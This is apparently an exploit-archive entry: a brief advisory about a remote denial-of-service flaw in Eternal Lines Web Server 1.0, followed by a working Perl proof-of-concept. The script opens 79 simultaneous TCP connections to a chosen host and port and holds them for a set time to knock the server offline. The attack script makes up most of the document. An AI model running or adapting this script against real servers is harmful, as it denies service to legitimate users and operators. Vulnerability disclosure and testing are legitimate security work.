source: https://www.securityfocus.com/bid/12416/info Eternal Lines Web Server is reported prone to a remote denial of service vulnerability. It is reported that the issue presents itself when the web service handles 70 or more simultaneous connections from a remote host. A remote attacker may exploit this vulnerability to deny service to legitimate users. #!/usr/bin/perl ############################################################## # GSS-IT Research And Security Labs # ############################################################## # # # www.gssit.co.il # # # ############################################################## # Eternal Lines Web Server Ver 1.0 Denial Of Service POC # ############################################################## use Socket; $host = $ARGV[0]; $port = $ARGV[1]; $slp = $ARGV[2]; $proto = getprotobyname('tcp'); if (($#ARGV) < 2) { print("##########################################################\n"); print("# Eternal Lines Web Server Ver 1.0 Denial Of Service POC #\n"); print("##########################################################\n\n"); print("Use : \n\nperl $0 [Host] [Port] [Sleep] \n"); exit } print("##########################################################\n"); print("# Eternal Lines Web Server Ver 1.0 Denial Of Service POC #\n"); print("##########################################################\n"); for ($i=1; $i<80; $i++) { socket($i, PF_INET, SOCK_STREAM, $proto ); $dest = sockaddr_in ($port, inet_aton($host)); if (!(connect($i, $dest))) { Slp(); } } print("==> Unsuccesful <=="); exit; sub Slp { print("\n\nServer $host Has Been Successfully DoS'ed\n\n"); print("The Server Will Be Down For $slp Seconds\n\n"); sleep ($slp); print("==> Killing Connections ...<==\n"); for ($j=1; $j<80; $j++) { shutdown($j,2); } print ("[#] Back To Work Server Up [#] "); exit; }